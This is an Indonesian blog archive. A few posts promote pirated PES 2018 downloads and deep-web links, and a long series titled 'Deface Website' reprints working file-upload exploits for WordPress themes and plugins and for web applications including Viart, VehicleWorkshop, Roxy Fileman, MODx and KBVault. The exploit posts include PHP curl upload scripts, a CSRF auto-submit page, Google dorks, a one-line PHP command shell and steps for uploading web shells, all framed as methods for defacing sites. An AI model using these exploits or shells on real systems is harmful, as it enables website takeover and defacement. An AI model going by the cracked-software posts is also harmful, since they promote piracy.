Sabtu, 23 September 2017

Kumpulan Link Deep Web 2017 Update Terbaru

Kumpulan Link Deep Web Update Terbaru

Selamat malam para penggila internet, kali ini saya akan bagikan beberapa link deepweb yang saya dapat, atau yang saya sering pake untuk sekedar berselancar yah, silahkan liat dibawah ini.

Kumpulan Link Deep Web Update Terbaru
Kumpulan Link Deep Web Update Terbaru


Deep Web Links Update:

Oke itulah yang bisa saya berikan, semoga bermanfaat :D

Download
Link Lengkap dari Sumber yang saya ambil.
[ VISIT ]
Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Kamis, 21 September 2017

Download PES 2018 Full Version + Crack + Patch Free

Download PES 2018 Full Version + Crack + Patch Free


Pro Evolution Soccer (PES) adalah seri permainan video sepak bola yang dikembangkan dan diterbitkan oleh Konami. Seri ini diproduksi di bawah pengawasan Shingo "Seabass" Takatsuka.

Setiap tahun, permainan ini dirilis sekitar akhir September dan/atau awal Oktober dengan dua judul yang berbeda: World Soccer: Winning Eleven di Jepang, dan Pro Evolution Soccer di negara lainnya. Versi Jepang merupakan versi lokal yang termasuk di dalamnya liga sepak bola lokal. Tahun 2007, permainan ini mulai menggunakan judul permainan "Winning Eleven: Pro Evolution Soccer" untuk pasar Amerika, yang kemudian diubah menjadi "Pro Evolution Soccer" tahun 2008.

Download PES 2018 Full Version + Crack + Patch Free
Download PES 2018 Full Version + Crack + Patch Free


Pemain Portugal, Cristiano Ronaldo, pernah menjadi model untuk sampul depan DVD pada setiap permainan yang dirilis serta untuk iklan dan media promosi lainnya semenjak 2012 hingga 2014. Kemudian digantikan oleh Mario Götze.

Pada Desember 2011, Pro Evolution Soccer telah diterjemahkan ke 19 bahasa dan tersedia di 62 negara, termasuk Indonesia. Pada Desember 2012, seri permainan ini dijual hingga 81,65 juta kopi di seluruh dunia, yang menjadikannya sebagai salah satu permainan terlaris di dunia.

Spesifikasi

Persyaratan Sistem Minimum


OS: Windows 7/8 / 8.1 / 10
Prosesor: INTEL Core i3
RAM: 2 GB
Memori Video: 512 MB
Kartu Video: NVIDIA GeForce 8800 GS atau ATI Radeon X1600 XT
Sound Card: DirectX Kompatibel
DirectX: 9.0c
Hard Drive: 10 GB gratis

Persyaratan Sistem yang Disarankan


OS: Windows 7/8 / 8.1 / 10
Prosesor: INTEL Core i5
RAM: 4 GB
Memori Video: 1 GB
Kartu Video: NVIDIA GeForce GTX 260 atau ATI Radeon HD 4850
Sound Card: DirectX Kompatibel
DirectX: 9.0c
Hard Drive: 10 GB gratis

Steam adalah PC


Spesifikasi PES 2018
Spesifikasi PES 2018

Fitur PES 2018 PC Game

Setelah Instalasi PES 2018 Free Download PC Game, Anda Bisa Menikmati Beberapa Fitur.

  • Game Baru di Seri Super Hit.
  • Peningkatan Pemutar Putar dan Pemutar Game.
  • Pilih Satu Tim Dari Tim Terkenal.
  • Bermain di Berbagai Turnamen dan Liga.
  • Kontrol Tim Anda Dengan Sempurna.
  • Pelajari Keterampilan Baru Dan Bergerak Di Game Play.
  • Jadikan Banyak Tujuan Sebagai Kemungkinan Dalam Pertandingan.
  • Lakukan Semua Jenis Tindakan di Game.
  • Buat Tim Anda Sendiri Menurut Gaya Bermain.
  • Berbagai Mode Permainan Dengan Tujuan Sendiri.
  • Hentikan Tujuan Lawan Dengan Gerakan yang Benar.
  • Menjadi Tim Sepak Bola Terbaik di Dunia.
  • Bersaing Dengan Pemain Lain Dalam Multiplayer.
  • Mesin Grafis Upgrade untuk Peningkatan Visual.
  • Superb Game Sounds With Original Sound Track.

Screenshoot

Download PES 2018 Full Version + Crack + Patch Free
Download PES 2018 Full Version + Crack + Patch Free

Demo

Download PES 2018 Full Version + Crack + Patch Free

NB. Untuk Link Download Belom Ada, mungkin nunggu tahun 2018 baru ada link downloadnya :D

Download
Download PES 2018 Full Version + Crack + Patch Free
LINK 1 - LINK 2 - LINK 3 - LINK 4 - LINK 5
Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Menambang Bitcoin dengan Mudah dan Cepat 100% Work

Menambang Bitcoin dengan Mudah dan Cepat 100% Work


Bitcoin adalah mata uang digital yang sangat populer saat ini, bitcoin bisa didapatkan dengan mudah dengan aplikasi free tanpa berbayar, ataupun dengan aplikasi mining (Miner), semua materi tentang bitcoin akan dibahas dengan lengkap di website yang saya berikan.

Menambang Bitcoin dengan Mudah dan Cepat 100% Work
Menambang Bitcoin dengan Mudah dan Cepat 100% Work


Untuk anda yang pertama mengenal bitcoin sangat cocok membaca artikel yang akan saya berikan, agar lebih mengenal bitcoin dengan baik, dan tidak akan terperangkap dalam sebuah aplikasi atau website SPAM yang marak terjadi sekarang ini.

Visit [ Free Bitcoin Ku ]

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Rabu, 20 September 2017

Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload

Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload


The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload
Deface Website WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload


Felici 1.7 is vulnerable; other versions may also be affected. 

<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Selasa, 19 September 2017

Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload

Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload


* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x

Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload
Deface Website WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload


Description
================================================================================
 The Beauty Premium theme contains a contact form that is vulnerable to CSRF
 and File Upload vulnerability in the sendmail.php file. The file attachment
 gets uploaded to the wordpress upload directory and it is not sanitized,
 allowing attackers to upload harmful code. 

PoC
================================================================================
Google Dork inurl:themes/beauty-premium/ or detect via WPScan:

<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" /> </li>
</form>

You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Senin, 18 September 2017

Deface Website Metode WordPress Plugin Premium Gallery Manager - Arbitrary File Upload

Deface Website Metode WordPress Plugin Premium Gallery Manager - Arbitrary File Upload


Premium Gallery Manager plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks may also possible. 

<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://www.example.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Minggu, 17 September 2017

Deface Website Metode Viart Shopping Cart 5.0 - Cross-Site Request Forgery Arbitrary File Upload

Viart Shopping Cart 5.0 - Cross-Site Request Forgery  Arbitrary File Upload


<!--
# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
# Date : 2016/06/12
# Google Dork : Script-Kiddie ;)
# Exploit Author : Ali Ghanbari
# Vendor Homepage : http://www.viart.com/
# Software Link  : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
# Version : 5.0

Deface Website Metode Viart Shopping Cart 5.0
Deface Website Metode Viart Shopping Cart 5.0


#POC
-->

<html>
  <body onload="submitRequest();">
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = "true";
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"dir_root\"\r\n" +
          "\r\n" +
          "../images\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
          "Content-Type: application/x-php\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------256672629917035--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>

<!--
#Desc:

upload exploit code in your host and send link to admin when admin click on link, you can
access to your shell from below path :

http://localhost/images/[your shell]

####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007  
-->

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Sabtu, 16 September 2017

Deface Website Metode VehicleWorkshop Unrestricted File Upload or Shell Upload

Deface Website Metode  VehicleWorkshop Unrestricted File Upload or Shell Upload

# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload
# Exploit Author: Touhid M.Shaikh
# Date: 1/08/2017
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on : Kali Linux 2.0 64 bit and Windows 7


===================
Vulnerable Page:
===================

http://192.168.1.13/sellvehicle.php

====================
Vulnerable Source:
====================


--------------------------------PHP code-----------
<?php
if(isset($_POST["submit"]))
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);


--------------------------------------------------

-----------------------HTML Form -----------------
<label for="images"></label>
      <label for="file"></label>
      <input type="file" name="file" id="file" /><input type="hidden"
name="image"  />

-----------------------------------------------------------------------

U can upload Shell or File via Regular or customer User Account.

 ================= POC ======================

We need to login any customer account or create an account (
http://192.168.1.13/registration.php) and login.

After customer panel open Navigate to
http://192.168.1.13/sellvehicle.php

and feed data and upload you unrestricted file.

--------------------------Request---------------------------

POST /sellvehicle.php HTTP/1.1
Host: 192.168.1.13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------144421253520516158491092952973
Content-Length: 1085
Referer: http://192.168.1.13/sellvehicle.php
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10
Connection: close
Upgrade-Insecure-Requests: 1

.
.
.
.skip

Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>

.
.
.
.skip
------------------------------------------------------------------------------

--------------------------Rsponse --------------------------
HTTP/1.1 200 OK
Date: Mon, 31 Jul 2017 20:38:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 2909
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------


====================================================================

Now You Can Access you Shell or File in /upload/backdoor.php

http://192.168.1.13/upload/backdoor.php


Enjoy !

Regards.
Touhid Shaikh
Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Jumat, 15 September 2017

Deface Website Metode SpagoBI 4.0 - Arbitrary Cross-Site Scripting Arbitrary File Upload

Deface Website Metode SpagoBI 4.0 - Arbitrary Cross-Site Scripting  Arbitrary File Upload


###################################################

Deface Website Metode SpagoBI 4.0
Deface Website Metode SpagoBI 4.0


01. ###  Advisory Information ###

Title: XSS File Upload
Date published: 2014-03-01
Date of last update: 2014-03-01
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: Medium


02. ###  Vulnerability Information ###

CVE reference: CVE-2013-6234
CVSS v2 Base Score: 4
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Component/s: SpagoBI
Class: Input Manipulation


03. ### Introduction ###

SpagoBI[1] is an Open Source Business Intelligence suite, belonging to 
the free/open source SpagoWorld initiative, founded and supported by 
Engineering Group[2].
It offers a large range of analytical functions, a highly functional 
semantic layer often absent in other open source platforms and projects, 
and a respectable set of advanced data visualization features including 
geospatial analytics.
[3]SpagoBI is released under the Mozilla Public License, allowing its 
commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 
Consortium, an independent open-source software community.

[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] - 
http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi


04. ### Vulnerability Description ###

SpagoBI contains a flaw that may allow a remote attacker to execute 
arbitrary code. This flaw exists because the application does not 
restrict uploading for specific file types from Worksheet designer 
function.
This may allow a remote attacker to upload arbitrary files (e.g. .html 
for XSS) that would execute arbitrary script code in a user's browser 
within the trust relationship between their browser and the server or 
more easily conduct more serious attacks.

05. ### Technical Description / Proof of Concept Code ###

An attacker  (a SpagoBI malicious user with a restricted account) can 
upload a file from Worksheet designer function.

To  reproduce the vulnerability follow the provided information and 
steps below:

- Using a browser log on to SpagoBI with restricted account (e.g. 
Business User Account)
- Go on:  Worksheet designer function
- Click on: Image  and Choose image
- Upload  malicious file and save it

XSS Malicious File Upload  Attack  has been successfully completed!

More details about SpagoBI Worksheet Engine and  Worksheet designer
http://wiki.spagobi.org/xwiki/bin/view/spagobi_server/Worksheet#HWorksheetoverview

(e.g. Malicious File:  xss.html)

<!DOCTYPE html>
<html>
<head>
<script>
function myFunction()
{alert("XSS");}
</script>
</head>
<body>
<input type="button" onclick="myFunction()" value="Show alert box">
</body>
</html>


06. ### Business Impact ###

Exploitation of the vulnerability requires low privileged application 
user account but low or medium user interaction. Successful exploitation 
of the vulnerability results in session hijacking, client-side phishing, 
client-side external redirects or malware loads and client-side 
manipulation of the vulnerable module context.


07. ### Systems Affected ###

This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.


08. ### Vendor Information, Solutions and Workarounds ###

This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204

Fixed by vendor [verified]


09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com


10.  ### Vulnerability History ###

October  09th, 2013: Vulnerability identification
October  22th, 2013: Vendor notification to  [SpagoBI Team]
November 05th, 2013: Vendor Response/Feedback  from  [SpagoBI Team]
December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
January  16th, 2014: Fix/Patch Verified
March    01st, 2014: Vulnerability disclosure


11. ### Disclaimer ###

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of 
this information.

###################################################

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Kamis, 14 September 2017

Deface Website Metode Roxy Fileman 1.4.4 - Arbitrary File Upload

Deface Website Metode Roxy Fileman 1.4.4 - Arbitrary File Upload


# Exploit Title: Roxy Fileman <= 1.4.4 Forbidden File Upload Vulnerability
# Google Dork: intitle:"Roxy file manager"
# Date: 15-06-2016
# Exploit Author: Tyrell Sassen
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.4-php
# Version: 1.4.4
# Tested on: PHP

Deface Website Metode Roxy Fileman
Deface Website Metode Roxy Fileman


1. Description

The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,
which keeps a list of forbidden file extensions that the application will
not allow to be uploaded. This configuration setting is also checked when
renaming an existing file to a new file extension.

It is possible to bypass this check and rename already uploaded files to
any extension, using the move function as this function does not perform
any checks.

2. Proof of Concept

http://host/fileman/php/movefile.php?f=/Upload/backdoor.jpg&n=/Upload/backdoor.php


The renamed file will now be accessible at http://host/Upload/backdoor.php

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Rabu, 13 September 2017

Deface Website Metode Penny Auction Script - Arbitrary File Upload

Deface Website Metode Penny Auction Script - Arbitrary File Upload


Deface Website Metode Penny Auction Script - Arbitrary File Upload
Deface Website Metode Penny Auction Script

Baca Juga.





# # # # # 
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: Penny Auction Script
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/tibs-eauction/
# Script Name: Penny Auction Script
# Script Buy Now: http://www.hotscripts.com/listing/penny-auction-software-156843/  
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
#Register in site ... and login 
#Goto profil
#Empty file .htaccess and Shell.php...

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Selasa, 12 September 2017

Deface Website Metode MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload

Deface Website Metode MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload


MODx Evogallery module is prone to an arbitrary file upload vulnerability.

Deface Website Metode MODx Evogallery Module
Deface Website Metode MODx Evogallery Module

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php";
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,    
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Senin, 11 September 2017

Deface Website Metode KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code

Deface Website Metode KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code

# Exploit Title: [KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code]
# Google Dork: [inurl:"FileExplorer/Explorer.aspx"]
# Date: [2017-06-14]
# Exploit Author: [Fatih Emiral]
# Vendor Homepage: [http://kbvaultmysql.codeplex.com/]
# Software Link: [http://kbvaultmysql.codeplex.com/downloads/get/858806]
# Version: [0.16a]
# Tested on: [Windows 7 (applicable to all Windows platforms)]
# CVE : [CVE-2017-9602]

Deface Website Metode KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code
Deface Website Metode KBVault MySQL v0.16a


1. Description

KBVault Mysql Free Knowledge Base application package comes with a third party file management component. An unauthenticated user can access the file upload (and delete) functionality using the following URI:

http://host/FileExplorer/Explorer.aspx?id=/Uploads

2. Exploit

Through this functionality a user can upload an ASPX script to run any arbitrary code, e.g.:

http://host/Uploads/Documents/cmd.aspx
3. Solution

Unauthenticated access to the file management function should be prohibited.
File uploads should be checked against executable formats, and only acceptable file types should be allowed to upload.

4. Disclosure Timeline

2017-06-09: Vendor notification
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-12: CVE number acquired
2017-06-15: Public disclosure

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Minggu, 10 September 2017

Deface Website Metode Global In - Arbitrary File Upload

Deface Website Metode Global In - Arbitrary File Upload

# # # # # 
# Exploit Title: Global In - Arbitrary File Upload
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# Login as regular user
# http://localhost/[PATH]/dashboard
# Upload Photo / File.php
# http://localhost/[PATH]/post-images/1113330455_File.php
# Etc..
# # # # #

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Sabtu, 09 September 2017

Deface Website Metode Frog CMS 0.9.5 - Arbitrary File Upload

Deface Website Metode Frog CMS 0.9.5 - Arbitrary File Upload


Deface Website Metode Frog CMS 0.9.5
Deface Website Metode Frog CMS 0.9.5


Exploit Title: Arbitrary File Upload in Frog CMS 0.9.5
Date : 2014-07-07
Exploit Author : Javid Hussain
Vendor Homepage : http://www.madebyfrog.com

# Exploit-DB Note: All authenticated users can upload files. If the file 
# does not have execute permissions the CMS allows users to change them.
# No need to be authenticated to trigger uploaded files.

There is a possibility to upload arbitrary file in Frog CMS latest version 0.9.5


Baca Juga.





POC:

The vulnerability exist because of the filemanager plugin is not properly
verifying the extension of uploaded files.

Go to     http://localhost/frog_095/admin/?/plugin/file_manager/images

Upload an executable php file

Go to     http://localhost/Frog/frog_095/public/images/

for verification.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]